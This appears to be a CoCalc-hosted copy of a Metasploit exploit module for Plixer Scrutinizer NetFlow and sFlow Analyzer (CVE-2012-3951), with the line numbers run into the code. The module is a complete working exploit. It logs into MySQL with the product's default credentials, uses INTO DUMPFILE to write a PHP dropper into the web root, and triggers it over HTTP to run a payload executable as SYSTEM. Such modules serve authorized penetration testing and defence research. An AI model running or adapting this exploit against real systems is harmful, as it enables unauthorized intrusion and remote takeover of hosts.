CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::MYSQL9include Msf::Exploit::Remote::HttpClient10include Msf::Exploit::EXE1112def initialize(info={})13super(update_info(info,14'Name' => "Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential",15'Description' => %q{16This exploits an insecure config found in Scrutinizer NetFlow & sFlow Analyzer.17By default, the software installs a default password in MySQL, and binds the18service to "0.0.0.0". This allows any remote user to login to MySQL, and then19gain arbitrary remote code execution under the context of 'SYSTEM'. Examples20of default credentials include: 'scrutinizer:admin', and 'scrutremote:admin'.21},22'License' => MSF_LICENSE,23'Author' =>24[25'MC',26'Jonathan Claudius',27'Tanya Secker',28'sinn3r'29],30'References' =>31[32['CVE', '2012-3951'],33['OSVDB', '84317'],34['URL', 'http://web.archive.org/web/20140722224651/http://secunia.com/advisories/50074/'],35['URL', 'https://www.trustwave.com/spiderlabs/advisories/TWSL2012-014.txt']36],37'Payload' =>38{39'BadChars' => "\x00"40},41'DefaultOptions' =>42{43'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'44},45'Platform' => 'win',46'Targets' =>47[48['Scrutinizer NetFlow and sFlow Analyzer 9.5.2 or older', {}]49],50'Privileged' => false,51'DisclosureDate' => '2012-07-27',52'DefaultTarget' => 0))5354register_options(55[56OptString.new("USERNAME", [true, 'The default MySQL username', 'scrutremote']),57OptString.new("PASSWORD", [true, 'The default MySQL password', 'admin']),58OptPort.new("MYSQLPORT", [true, 'The MySQL\'s remote port', 3306]),59OptPort.new("HTTPPORT", [true, 'The HTTP Server\'s remote port', 80]),60OptString.new("TARGETURI", [true, 'The web application\'s base path', '/'])61])6263# Both MySQL and HTTP need to use this, we'll have to register on the fly.64deregister_options('RPORT')6566self.needs_cleanup = true67end686970def check71tmp_rport = datastore['RPORT']72datastore['RPORT'] = datastore['HTTPPORT']73res = send_request_raw({'uri'=>'/'}) #Check the base path for regex74datastore['RPORT'] = tmp_rport75if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and76res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-2]\<\/div\>/77return Exploit::CheckCode::Appears78end7980return Exploit::CheckCode::Safe81end828384def get_php_payload(fname)85p = Rex::Text.encode_base64(generate_payload_exe)86php = %Q|87<?php88$f = fopen("#{fname}", "wb");89fwrite($f, base64_decode("#{p}"));90fclose($f);91exec("#{fname}");92?>93|94php = php.gsub(/^ {4}/, '').gsub(/\n/, ' ')95return php96end979899#100# I wanna be able to choose my own destination... path!101#102def mysql_upload_binary(bindata, path)103# Modify the rport so we can use MySQL104datastore['RPORT'] = datastore['MYSQLPORT']105106# Login107h = mysql_login(datastore['USERNAME'], datastore['PASSWORD'])108return false if not h109110tmp = mysql_get_temp_dir111p = bindata.unpack("H*")[0]112dest = tmp + path113mysql_query("SELECT 0x#{p} into DUMPFILE '#{dest}'")114return true115end116117118def exe_php(php_fname)119# Modify the rport so we can use HTTP120datastore['RPORT'] = datastore['HTTPPORT']121122# Request our payload123uri = normalize_uri(target_uri.path)124path = File.dirname("#{uri}/.")125res = send_request_raw({'uri'=>"#{path}#{php_fname}"})126return (res and res.code == 200)127end128129130def cleanup131datastore['RPORT'] = @original_rport132end133134135def on_new_session(cli)136if cli.type != 'meterpreter'137print_error("Please remember to manually remove #{@exe_fname} and #{@php_fname}")138return139end140141cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")142143begin144print_warning("Deleting #{@php_fname}")145cli.fs.file.rm(@php_fname)146rescue ::Exception => e147print_error("Please note: #{@php_fname} is stil on disk.")148end149150begin151print_warning("Deleting #{@exe_fname}")152cli.fs.file.rm(@exe_fname)153rescue ::Exception => e154print_error("Please note: #{@exe_fname} is still on disk.")155end156end157158159def exploit160@original_rport = datastore['RPORT']161162#163# Prepare our payload (naughty exe embedded in php)164#165@exe_fname = Rex::Text.rand_text_alpha(6) + '.exe'166p = get_php_payload(@exe_fname)167168#169# Upload our payload to the html directory170#171print_status("Uploading #{p.length.to_s} bytes via MySQL...")172@php_fname = Rex::Text.rand_text_alpha(5) + '.php'173if not mysql_upload_binary(p, "../../html/#{@php_fname}")174print_error("That MySQL upload didn't work.")175return176end177178#179# Execute the payload180#181print_status("Requesting #{@php_fname}...")182res = exe_php(@php_fname)183184handler185end186end187188189